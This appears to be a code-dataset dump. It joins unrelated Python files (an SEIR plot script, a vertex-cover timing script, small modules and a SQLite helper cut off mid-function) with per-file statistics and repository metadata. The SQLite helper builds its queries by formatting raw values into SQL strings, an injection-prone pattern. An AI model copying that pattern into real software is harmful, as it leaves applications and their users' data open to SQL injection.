plot_S, plot_E, plot_I, plot_R = plot_S[0], plot_S[1], plot_S[2], plot_S[3]
ax.plot(plot_x, plot_I / self.N, label='Infectives')
ax.plot(plot_x, plot_E / self.N, label='Exposed')
ax.plot(plot_x, plot_S / self.N, label='Susceptibles')
ax.plot(plot_x, plot_R / self.N, label='Removed')
plt.legend()
plt.show()
def main():
# model = SI(N=1000, r=120, beta=0.005, I0=1)
# model = SIS(N=1000, r=100, beta=0.005, gamma=0.1, I0=1)
# model = SIR(N=1000, r=100, beta=0.003, gamma=0.1, I0=1, R0=0)
# model.show(t_begin=0, t_end=100)
# model = SIR(N=1000, r=100, beta=0.003, gamma=0.1, I0=20, R0=400)
# model.show(t_begin=0, t_end=100)
# model = SEIR(N=1000, r=100, beta=0.003, sigma=0.3, gamma=0.1, E0=40, I0=20, R0=0)
# model.show(t_begin=0, t_end=100)
model = SEIR(N=10000, r=20, beta=0.03, sigma=0.1, gamma=0.1, E0=0, I0=1, R0=0)
model.show(t_begin=0, t_end=140)
if __name__ == '__main__':
main()
| 34.491667
| 118
| 0.517758
| 1,177
| 8,278
| 3.525064
| 0.107052
| 0.036153
| 0.032538
| 0.034466
| 0.857315
| 0.83008
| 0.807423
| 0.772234
| 0.765968
| 0.753676
| 0
| 0.043366
| 0.345373
| 8,278
| 239
| 119
| 34.635983
| 0.722273
| 0.225054
| 0
| 0.748387
| 0
| 0
| 0.057486
| 0.018613
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.019355
| 0.006452
| 0.180645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7a9bfb16945c8fc02d7d517186ed42f860acfb8
| 61
|
py
|
Python
|
dragon/func/__init__.py
|
InfernalAzazel/dragon
|
464056feb8ecaac55eabedb0a083ea9f609a5753
|
[
"Apache-2.0"
] | null | null | null |
dragon/func/__init__.py
|
InfernalAzazel/dragon
|
464056feb8ecaac55eabedb0a083ea9f609a5753
|
[
"Apache-2.0"
] | null | null | null |
dragon/func/__init__.py
|
InfernalAzazel/dragon
|
464056feb8ecaac55eabedb0a083ea9f609a5753
|
[
"Apache-2.0"
] | null | null | null |
from func import jd_front_event
from func import jd_web_hook
| 20.333333
| 31
| 0.868852
| 12
| 61
| 4.083333
| 0.666667
| 0.326531
| 0.571429
| 0.653061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131148
| 61
| 2
| 32
| 30.5
| 0.924528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a7dc294b0dd46ac3f64e09396849dc5f1321ce8a
| 155
|
py
|
Python
|
probeye/inference/torch_/__init__.py
|
BAMresearch/probeye
|
ff018ef629f7d5ce4a263b6656b363f90ab6be02
|
[
"MIT"
] | null | null | null |
probeye/inference/torch_/__init__.py
|
BAMresearch/probeye
|
ff018ef629f7d5ce4a263b6656b363f90ab6be02
|
[
"MIT"
] | 42
|
2021-08-24T06:50:17.000Z
|
2022-03-25T09:05:41.000Z
|
probeye/inference/torch_/__init__.py
|
BAMresearch/probeye
|
ff018ef629f7d5ce4a263b6656b363f90ab6be02
|
[
"MIT"
] | 2
|
2021-11-14T22:30:54.000Z
|
2022-02-28T13:39:00.000Z
|
# module imports
from probeye.inference.torch_ import noise_models
from probeye.inference.torch_ import priors
from probeye.inference.torch_ import solver
| 31
| 49
| 0.858065
| 21
| 155
| 6.142857
| 0.52381
| 0.255814
| 0.465116
| 0.581395
| 0.72093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 155
| 4
| 50
| 38.75
| 0.921429
| 0.090323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
ac0b39275d3539e83041db32829caa1370193789
| 13,176
|
py
|
Python
|
pkg_1/scriptTesting7.py
|
giuseppemas/3gruppo_4_TDP
|
d85c5e232cbaa0a9a3512fdce906ea9fab7b1334
|
[
"MIT"
] | null | null | null |
pkg_1/scriptTesting7.py
|
giuseppemas/3gruppo_4_TDP
|
d85c5e232cbaa0a9a3512fdce906ea9fab7b1334
|
[
"MIT"
] | null | null | null |
pkg_1/scriptTesting7.py
|
giuseppemas/3gruppo_4_TDP
|
d85c5e232cbaa0a9a3512fdce906ea9fab7b1334
|
[
"MIT"
] | null | null | null |
'''Valutare sperimentalmente le prestazioni dei due metodi su un campione di almeno k grafi (con k > 50) con n vertici
(n > 50) con scelti a caso. Per ciascun grafo fornire le dimensioni dei vertex cover restituiti dai due metodi ed i
relativi tempi di esecuzione. Calcolare di quanto in media l’algoritmo greedy è più veloce rispetto all’algoritmo ottimo
e di quanto il vertex cover restituito è più grande.'''
from pkg_1.MyGraph import MyGraph
import time
print("Testing50 #1: Grafo non diretto non pesato con 51 vertici e 20 archi")
graph2 = MyGraph()
vert = []
for i in range (1,52):
vert.append(graph2.insert_vertex(i))
print("Vertici: [")
for v in graph2.vertices():
print(v, end=", ")
print("]\n\n")
in_file = open("test50.txt","r") #lettura da file
testo = in_file.read()
in_file.close()
lettura = testo.splitlines()
lettura = list(lettura)
lenLettura = len(lettura)
i = 2
while i < lenLettura:
endpoints = lettura[i].split(" ") #inserisce i 2 estremi in un array di 2 elementi
j = 0
while vert[j]._element != int(endpoints[0]):
j = j+1
z = 0
while vert[z]._element != int(endpoints[1]):
z = z + 1
graph2.insert_edge(vert[j],vert[z])
i = i+5
print("Archi: [")
for e in graph2.edges():
print(e, end=", ")
print("]\n\n")
print("Greedy vertex cover: ")
inizio_GVC = time.clock()
listGVC = graph2.greedy_vertex_cover()
fine_GVC = time.clock()
t_GVC = fine_GVC - inizio_GVC
for elem in listGVC:
print(elem, end=", ")
print("\nMin vertex cover: ")
inizio_MVC = time.clock()
listMVC = graph2.min_vertex_cover()
fine_MVC = time.clock()
t_MVC = fine_MVC - inizio_MVC
for elem in listMVC:
print(elem, end=", ")
print("\n\nGREEDY --> Dim =", len(listGVC), ", Time =", t_GVC, "s\n")
print("MIN --> Dim =", len(listMVC), ", Time =", t_MVC, "s\n")
print("La dimensione dell'algoritmo Greedy è di", len(listGVC)-len(listMVC), "vertici in più rispetto all'algoritmo Min.\n")
print("L'algoritmo Greedy è", t_MVC/t_GVC, "volte piu' veloce di quello Min.\n")
print("L'algoritmo Greedy impiega", t_MVC-t_GVC, "secondi in meno rispetto a quello Min.\n")
print("\n\n")
#---------------------------------------------------------------------------------------
print("Testing50 #2: Grafo non diretto non pesato con 51 vertici e 25 archi")
graph2 = MyGraph()
vert = []
for i in range (1,52):
vert.append(graph2.insert_vertex(i))
print("Vertici: [")
for v in graph2.vertices():
print(v, end=", ")
print("]\n\n")
in_file = open("test50.txt","r") #lettura da file
testo = in_file.read()
in_file.close()
lettura = testo.splitlines()
lettura = list(lettura)
lenLettura = len(lettura)
i = 2
while i < lenLettura:
endpoints = lettura[i].split(" ") #inserisce i 2 estremi in un array di 2 elementi
j = 0
while vert[j]._element != int(endpoints[0]):
j = j+1
z = 0
while vert[z]._element != int(endpoints[1]):
z = z + 1
graph2.insert_edge(vert[j],vert[z])
i = i+4
print("Archi: [")
for e in graph2.edges():
print(e, end=", ")
print("]\n\n")
print("Greedy vertex cover: ")
inizio_GVC = time.clock()
listGVC = graph2.greedy_vertex_cover()
fine_GVC = time.clock()
t_GVC = fine_GVC - inizio_GVC
for elem in listGVC:
print(elem, end=", ")
print("\nMin vertex cover: ")
inizio_MVC = time.clock()
listMVC = graph2.min_vertex_cover()
fine_MVC = time.clock()
t_MVC = fine_MVC - inizio_MVC
for elem in listMVC:
print(elem, end=", ")
print("\n\nGREEDY --> Dim =", len(listGVC), ", Time =", t_GVC, "s\n")
print("MIN --> Dim =", len(listMVC), ", Time =", t_MVC, "s\n")
print("La dimensione dell'algoritmo Greedy è di", len(listGVC)-len(listMVC), "vertici in più rispetto all'algoritmo Min.\n")
print("L'algoritmo Greedy è", t_MVC/t_GVC, "volte piu' veloce di quello Min.\n")
print("L'algoritmo Greedy impiega", t_MVC-t_GVC, "secondi in meno rispetto a quello Min.\n")
print("\n\n")
#---------------------------------------------------------------------------------------
print("Testing50 #3: Grafo non diretto non pesato con 51 vertici 34 archi")
graph2 = MyGraph()
vert = []
for i in range (1,52):
vert.append(graph2.insert_vertex(i))
print("Vertici: [")
for v in graph2.vertices():
print(v, end=", ")
print("]\n\n")
in_file = open("test50.txt","r") #lettura da file
testo = in_file.read()
in_file.close()
lettura = testo.splitlines()
lettura = list(lettura)
lenLettura = len(lettura)
i = 2
while i < lenLettura:
endpoints = lettura[i].split(" ") #inserisce i 2 estremi in un array di 2 elementi
j = 0
while vert[j]._element != int(endpoints[0]):
j = j+1
z = 0
while vert[z]._element != int(endpoints[1]):
z = z + 1
graph2.insert_edge(vert[j],vert[z])
i = i+3
print("Archi: [")
for e in graph2.edges():
print(e, end=", ")
print("]\n\n")
print("Greedy vertex cover: ")
inizio_GVC = time.clock()
listGVC = graph2.greedy_vertex_cover()
fine_GVC = time.clock()
t_GVC = fine_GVC - inizio_GVC
for elem in listGVC:
print(elem, end=", ")
print("\nMin vertex cover: ")
inizio_MVC = time.clock()
listMVC = graph2.min_vertex_cover()
fine_MVC = time.clock()
t_MVC = fine_MVC - inizio_MVC
for elem in listMVC:
print(elem, end=", ")
print("\n\nGREEDY --> Dim =", len(listGVC), ", Time =", t_GVC, "s\n")
print("MIN --> Dim =", len(listMVC), ", Time =", t_MVC, "s\n")
print("La dimensione dell'algoritmo Greedy è di", len(listGVC)-len(listMVC), "vertici in più rispetto all'algoritmo Min.\n")
print("L'algoritmo Greedy è", t_MVC/t_GVC, "volte piu' veloce di quello Min.\n")
print("L'algoritmo Greedy impiega", t_MVC-t_GVC, "secondi in meno rispetto a quello Min.\n")
print("\n\n")
#---------------------------------------------------------------------------------------
print("Testing50 #4: Fiore --> Grafo non diretto non pesato con 26 vertici e 73 archi")
G = MyGraph()
V = []
V.append(G.insert_vertex('a'))
V.append(G.insert_vertex('b'))
V.append(G.insert_vertex('c'))
V.append(G.insert_vertex('d'))
V.append(G.insert_vertex('e'))
V.append(G.insert_vertex('f'))
V.append(G.insert_vertex('g'))
V.append(G.insert_vertex('h'))
V.append(G.insert_vertex('i'))
V.append(G.insert_vertex('j'))
V.append(G.insert_vertex('k'))
V.append(G.insert_vertex('l'))
V.append(G.insert_vertex('m'))
V.append(G.insert_vertex('n'))
V.append(G.insert_vertex('o'))
V.append(G.insert_vertex('p'))
V.append(G.insert_vertex('q'))
V.append(G.insert_vertex('r'))
V.append(G.insert_vertex('s'))
V.append(G.insert_vertex('t'))
V.append(G.insert_vertex('u'))
V.append(G.insert_vertex('v'))
V.append(G.insert_vertex('w'))
V.append(G.insert_vertex('x'))
V.append(G.insert_vertex('y'))
V.append(G.insert_vertex('z'))
for i in range(len(V)):
if i != 0:
G.insert_edge(V[0],V[i])
for i in range(len(V)):
if i != 0 and i != len(V) - 1:
G.insert_edge(V[i],V[i + 1])
G.insert_edge(V[-1], V[1])
for i in range(len(V)):
if i != 0 and (i != len(V) - 2 and i != len(V) - 1):
G.insert_edge(V[i],V[i + 2])
print("Greedy vertex cover: ")
inizio_GVC = time.clock()
listGVC = G.greedy_vertex_cover()
fine_GVC = time.clock()
t_GVC = fine_GVC - inizio_GVC
for elem in listGVC:
print(elem, end=", ")
print("\nMin vertex cover: ")
inizio_MVC = time.clock()
listMVC = G.min_vertex_cover()
fine_MVC = time.clock()
t_MVC = fine_MVC - inizio_MVC
for elem in listMVC:
print(elem, end=", ")
print("\n\nGREEDY --> Dim =", len(listGVC), ", Time =", t_GVC, "s\n")
print("MIN --> Dim =", len(listMVC), ", Time =", t_MVC, "s\n")
print("La dimensione dell'algoritmo Greedy è di", len(listGVC)-len(listMVC), "vertici in più rispetto all'algoritmo Min.\n")
print("L'algoritmo Greedy è", t_MVC/t_GVC, "volte piu' veloce di quello Min.\n")
print("\n\n")
#---------------------------------------------------------------------------------------
print("Testing50 #5: Tratto dai miserabili.txt: Grafo non diretto pesato con 77 vertici e 77 archi")
graph2 = MyGraph()
vert = []
for i in range (1,78):
vert.append(graph2.insert_vertex(i))
print("Vertici: [")
for v in graph2.vertices():
print(v, end=", ")
print("]\n\n")
in_file = open("miserabili.txt","r") #lettura da file
testo = in_file.read()
in_file.close()
lettura = testo.splitlines()
lettura = list(lettura)
lenLettura = len(lettura)
i = 2
while i < 78:
endpoints = lettura[i].split(" ") #inserisce i 2 estremi in un array di 2 elementi
j = 0
while vert[j]._element != int(endpoints[0]):
j = j+1
z = 0
while vert[z]._element != int(endpoints[1]):
z = z + 1
graph2.insert_edge(vert[j],vert[z])
i = i+1
print("Archi: [")
for e in graph2.edges():
print(e, end=", ")
print("]\n\n")
print("Greedy vertex cover: ")
inizio_GVC = time.clock()
listGVC = graph2.greedy_vertex_cover()
fine_GVC = time.clock()
t_GVC = fine_GVC - inizio_GVC
for elem in listGVC:
print(elem, end=", ")
print("\nMin vertex cover: ")
inizio_MVC = time.clock()
listMVC = graph2.min_vertex_cover()
fine_MVC = time.clock()
t_MVC = fine_MVC - inizio_MVC
for elem in listMVC:
print(elem, end=", ")
print("\n\nGREEDY --> Dim =", len(listGVC), ", Time =", t_GVC, "s\n")
print("MIN --> Dim =", len(listMVC), ", Time =", t_MVC, "s\n")
print("La dimensione dell'algoritmo Greedy è di", len(listGVC)-len(listMVC), "vertici in più rispetto all'algoritmo Min.\n")
print("L'algoritmo Greedy è", t_MVC/t_GVC, "volte piu' veloce di quello Min.\n")
print("L'algoritmo Greedy impiega", t_MVC-t_GVC, "secondi in meno rispetto a quello Min.\n")
print("\n\n")
#---------------------------------------------------------------------------------------
print("Testing50 #6: Tratto dai miserabili.txt: Grafo non diretto pesato con 77 vertici e 100 archi")
graph2 = MyGraph()
vert = []
for i in range (1,78):
vert.append(graph2.insert_vertex(i))
print("Vertici: [")
for v in graph2.vertices():
print(v, end=", ")
print("]\n\n")
in_file = open("miserabili.txt","r") #lettura da file
testo = in_file.read()
in_file.close()
lettura = testo.splitlines()
lettura = list(lettura)
lenLettura = len(lettura)
i = 2
while i < 101:
endpoints = lettura[i].split(" ") #inserisce i 2 estremi in un array di 2 elementi
j = 0
while vert[j]._element != int(endpoints[0]):
j = j+1
z = 0
while vert[z]._element != int(endpoints[1]):
z = z + 1
graph2.insert_edge(vert[j],vert[z])
i = i+1
print("Archi: [")
for e in graph2.edges():
print(e, end=", ")
print("]\n\n")
print("Greedy vertex cover: ")
inizio_GVC = time.clock()
listGVC = graph2.greedy_vertex_cover()
fine_GVC = time.clock()
t_GVC = fine_GVC - inizio_GVC
for elem in listGVC:
print(elem, end=", ")
print("\nMin vertex cover: ")
inizio_MVC = time.clock()
listMVC = graph2.min_vertex_cover()
fine_MVC = time.clock()
t_MVC = fine_MVC - inizio_MVC
for elem in listMVC:
print(elem, end=", ")
print("\n\nGREEDY --> Dim =", len(listGVC), ", Time =", t_GVC, "s\n")
print("MIN --> Dim =", len(listMVC), ", Time =", t_MVC, "s\n")
print("La dimensione dell'algoritmo Greedy è di", len(listGVC)-len(listMVC), "vertici in più rispetto all'algoritmo Min.\n")
print("L'algoritmo Greedy è", t_MVC/t_GVC, "volte piu' veloce di quello Min.\n")
print("L'algoritmo Greedy impiega", t_MVC-t_GVC, "secondi in meno rispetto a quello Min.\n")
print("\n\n")
#---------------------------------------------------------------------------------------
print("Testing50 #7: Tratto dai miserabili.txt: Grafo non diretto pesato con 77 vertici e 120 archi")
graph2 = MyGraph()
vert = []
for i in range (1,78):
vert.append(graph2.insert_vertex(i))
print("Vertici: [")
for v in graph2.vertices():
print(v, end=", ")
print("]\n\n")
in_file = open("miserabili.txt","r") #lettura da file
testo = in_file.read()
in_file.close()
lettura = testo.splitlines()
lettura = list(lettura)
lenLettura = len(lettura)
i = 2
while i < 121:
endpoints = lettura[i].split(" ") #inserisce i 2 estremi in un array di 2 elementi
j = 0
while vert[j]._element != int(endpoints[0]):
j = j+1
z = 0
while vert[z]._element != int(endpoints[1]):
z = z + 1
graph2.insert_edge(vert[j],vert[z])
i = i+1
print("Archi: [")
for e in graph2.edges():
print(e, end=", ")
print("]\n\n")
print("Greedy vertex cover: ")
inizio_GVC = time.clock()
listGVC = graph2.greedy_vertex_cover()
fine_GVC = time.clock()
t_GVC = fine_GVC - inizio_GVC
for elem in listGVC:
print(elem, end=", ")
print("\nMin vertex cover: ")
inizio_MVC = time.clock()
listMVC = graph2.min_vertex_cover()
fine_MVC = time.clock()
t_MVC = fine_MVC - inizio_MVC
for elem in listMVC:
print(elem, end=", ")
print("\n\nGREEDY --> Dim =", len(listGVC), ", Time =", t_GVC, "s\n")
print("MIN --> Dim =", len(listMVC), ", Time =", t_MVC, "s\n")
print("La dimensione dell'algoritmo Greedy è di", len(listGVC)-len(listMVC), "vertici in più rispetto all'algoritmo Min.\n")
print("L'algoritmo Greedy è", t_MVC/t_GVC, "volte piu' veloce di quello Min.\n")
print("L'algoritmo Greedy impiega", t_MVC-t_GVC, "secondi in meno rispetto a quello Min.\n")
print("\n\n")
| 32.694789
| 124
| 0.625152
| 2,072
| 13,176
| 3.873552
| 0.078185
| 0.034388
| 0.025916
| 0.045353
| 0.939447
| 0.878021
| 0.869424
| 0.869424
| 0.862945
| 0.845502
| 0
| 0.018308
| 0.166743
| 13,176
| 403
| 125
| 32.694789
| 0.712724
| 0.098968
| 0
| 0.855556
| 0
| 0
| 0.248692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005556
| 0
| 0.005556
| 0.311111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac39f83e4f760903de48bafcef37b0b0ef9233d9
| 111
|
py
|
Python
|
websocketstest/context_processors.py
|
phildini/websockets-test
|
e81fd37cfcc880b29bb895db8369321a9bb3f612
|
[
"Apache-2.0"
] | null | null | null |
websocketstest/context_processors.py
|
phildini/websockets-test
|
e81fd37cfcc880b29bb895db8369321a9bb3f612
|
[
"Apache-2.0"
] | 6
|
2021-03-19T02:20:24.000Z
|
2021-09-22T19:00:24.000Z
|
websocketstest/context_processors.py
|
phildini/websockets-test
|
e81fd37cfcc880b29bb895db8369321a9bb3f612
|
[
"Apache-2.0"
] | null | null | null |
from django.conf import settings
def webpack_env(request):
return {"WEBPACK_ENV": settings.WEBPACK_ENV}
| 15.857143
| 48
| 0.765766
| 15
| 111
| 5.466667
| 0.666667
| 0.365854
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144144
| 111
| 6
| 49
| 18.5
| 0.863158
| 0
| 0
| 0
| 0
| 0
| 0.099099
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ac67a2c119c67c319f65355d2eeb0162bdbc6c7d
| 75
|
py
|
Python
|
week13/bonus-tasks/lists_and_digits/tests.py
|
YAtOff/python0
|
b5af5004131d64dd52d42746eddb72b6c43a13c7
|
[
"Apache-2.0"
] | 6
|
2017-11-08T14:04:39.000Z
|
2019-03-24T22:11:04.000Z
|
archive/2016/projects/easy/lists_and_digits/tests.py
|
YAtOff/python0
|
b5af5004131d64dd52d42746eddb72b6c43a13c7
|
[
"Apache-2.0"
] | null | null | null |
archive/2016/projects/easy/lists_and_digits/tests.py
|
YAtOff/python0
|
b5af5004131d64dd52d42746eddb72b6c43a13c7
|
[
"Apache-2.0"
] | 7
|
2015-10-27T09:04:58.000Z
|
2019-03-03T14:18:26.000Z
|
import doctest
import lists_and_digits
doctest.testmod(lists_and_digits)
| 12.5
| 33
| 0.866667
| 11
| 75
| 5.545455
| 0.545455
| 0.262295
| 0.459016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093333
| 75
| 5
| 34
| 15
| 0.897059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ac691e4b88d3432f5de3411f4617ebb4c59a2cf8
| 346
|
py
|
Python
|
operators/examples/ComparisonOperators.py
|
lakshyamutneja/PyFlask_2k18
|
ab5d6bc4d87ee4829ad8b3553902bb0d346dcb7a
|
[
"MIT"
] | 98
|
2018-09-26T17:45:50.000Z
|
2020-04-08T17:54:50.000Z
|
operators/examples/ComparisonOperators.py
|
lakshyamutneja/PyFlask_2k18
|
ab5d6bc4d87ee4829ad8b3553902bb0d346dcb7a
|
[
"MIT"
] | 12
|
2018-09-29T18:53:31.000Z
|
2018-12-21T05:59:38.000Z
|
operators/examples/ComparisonOperators.py
|
lakshyamutneja/PyFlask_2k18
|
ab5d6bc4d87ee4829ad8b3553902bb0d346dcb7a
|
[
"MIT"
] | 36
|
2018-09-26T20:31:58.000Z
|
2020-10-08T07:01:09.000Z
|
# Comparison operators in Python
x = 10
y = 12
# Output: x > y is False
print('x > y is',x>y)
# Output: x < y is True
print('x < y is',x<y)
# Output: x == y is False
print('x == y is',x==y)
# Output: x != y is True
print('x != y is',x!=y)
# Output: x >= y is False
print('x >= y is',x>=y)
# Output: x <= y is True
print('x <= y is',x<=y)
| 15.727273
| 32
| 0.537572
| 74
| 346
| 2.513514
| 0.175676
| 0.193548
| 0.258065
| 0.322581
| 0.822581
| 0.822581
| 0.822581
| 0.822581
| 0.822581
| 0.822581
| 0
| 0.015326
| 0.245665
| 346
| 22
| 33
| 15.727273
| 0.697318
| 0.488439
| 0
| 0
| 0
| 0
| 0.317647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.75
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
3baab36321ca977fef1fd45afe9cc2ea35384f46
| 9,276
|
py
|
Python
|
Ago-Dic-2019/Ricardo_Romero_Medina/SegundoParcial/basedatos.py
|
Arbupa/DAS_Sistemas
|
52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1
|
[
"MIT"
] | 41
|
2017-09-26T09:36:32.000Z
|
2022-03-19T18:05:25.000Z
|
Ago-Dic-2019/Ricardo_Romero_Medina/SegundoParcial/basedatos.py
|
Arbupa/DAS_Sistemas
|
52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1
|
[
"MIT"
] | 67
|
2017-09-11T05:06:12.000Z
|
2022-02-14T04:44:04.000Z
|
Ago-Dic-2019/Ricardo_Romero_Medina/SegundoParcial/basedatos.py
|
Arbupa/DAS_Sistemas
|
52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1
|
[
"MIT"
] | 210
|
2017-09-01T00:10:08.000Z
|
2022-03-19T18:05:12.000Z
|
import sqlite3
def crear_base_datos():
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado a SQLite')
query = 'SELECT sqlite_version();'
cursor.execute(query)
row = cursor.fetchall()
print('Version de SQLite: ', row)
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion', error)
finally:
if(conexion):
conexion.close()
print('Conexion a SQLite cerrada\n')
def crear_tabala_artistas():
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado a SQLite')
query = '''
CREATE TABLE IF NOT EXISTS artistas(
Id TEXT PRIMARY KEY NOT NULL,
Banda TEXT NOT NULL,
Tipo TEXT NOT NULL,
Tag TEXT NOT NULL,
Area TEXT NOT NULL
);
'''
cursor.execute(query)
row = cursor.fetchall()
print('Tabla creada correctamente', row)
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion', error)
finally:
if(conexion):
conexion.close()
print('Conexion a SQLite cerrada\n')
def crear_tabala_discos():
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado a SQLite')
query = '''
CREATE TABLE IF NOT EXISTS disco(
Id TEXT PRIMARY KEY NOT NULL,
Banda TEXT NOT NULL,
Titulo TEXT NOT NULL,
Pais TEXT NOT NULL,
Status TEXT NOT NULL
);
'''
cursor.execute(query)
row = cursor.fetchall()
print('Tabla creada correctamente', row)
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion', error)
finally:
if(conexion):
conexion.close()
print('Conexion a SQLite cerrada\n')
def agregar_artista(banda):
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = """INSERT INTO artistas VALUES
('{}', '{}', '{}', '{}','{}')""".format(banda._Id, banda._Banda, banda._Tipo, banda._Tag, banda._Area)
resultado = cursor.execute(query)
conexion.commit()
print('Valor Insertado Correctamente', resultado)
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
conexion.close()
print('Conexion a SQLite cerrada\n')
def agregar_discos(album):
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = """INSERT INTO disco VALUES
('{}', '{}', '{}', '{}','{}')""".format(album._Id, album._Banda, album._Titulo, album._Pais, album._Status)
resultado = cursor.execute(query)
conexion.commit()
print('Valor Insertado Correctamente', resultado)
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
conexion.close()
print('Conexion a SQLite cerrada\n')
def Ver_Todos_Artistas():
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = 'SELECT * FROM artistas;'
cursor.execute(query)
rows = cursor.fetchall()
print('Total de registros: ', len(rows))
print('------------Registros-------------')
for row in rows:
print('Id: {}\nBanda: {}\nTipo: {}\nTag: {}\nArea: {}'.format(*row))
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
conexion.close()
def Ver_Artista():
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = 'SELECT Banda FROM artistas;'
cursor.execute(query)
rows = cursor.fetchall()
print('Total de registros: ', len(rows))
print('------------Registros-------------')
lista=[]
for row in rows:
lista.append(row[0])
cursor.close()
return lista
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
conexion.close()
def Ver_Un_Artista(banda):
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = "SELECT * FROM artistas WHERE banda = '{}';".format(banda)
cursor.execute(query)
rows = cursor.fetchall()
print('Total de registros: ', len(rows))
print('------------Registros-------------')
for row in rows:
print('Id: {}\nBanda: {}\nTipo: {}\nTag: {}\nArea: {}'.format(*row))
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
conexion.close()
def Ver_Discos(banda):
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = "SELECT Titulo FROM disco WHERE banda = '{}';".format(banda)
cursor.execute(query)
rows = cursor.fetchall()
print('Total de registros: ', len(rows))
print('------------Registros-------------')
for row in rows:
print('Id: {}\nBanda: {}\nTitulo: {}\nPais: {}\nStatus: {}'.format(*row))
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
conexion.close()
def Ver_Discos_Id_Banda(banda,titulo,id):
try:
conexion = sqlite3.connect('parcial2.db')
cursor = conexion.cursor()
print('Conectado')
query = "SELECT Titulo FROM disco WHERE banda = '{}' and Titulo = '{}' or Id = '{}';".format(banda,titulo,id)
cursor.execute(query)
rows = cursor.fetchall()
print('Total de registros: ', len(rows))
print('------------Registros-------------')
for row in rows:
print('Id: {}\nBanda: {}\nTitulo: {}\nPais: {}\nStatus: {}'.format(*row))
cursor.close()
except sqlite3.Error as error:
print('Error con la conexion',error)
finally:
if(conexion):
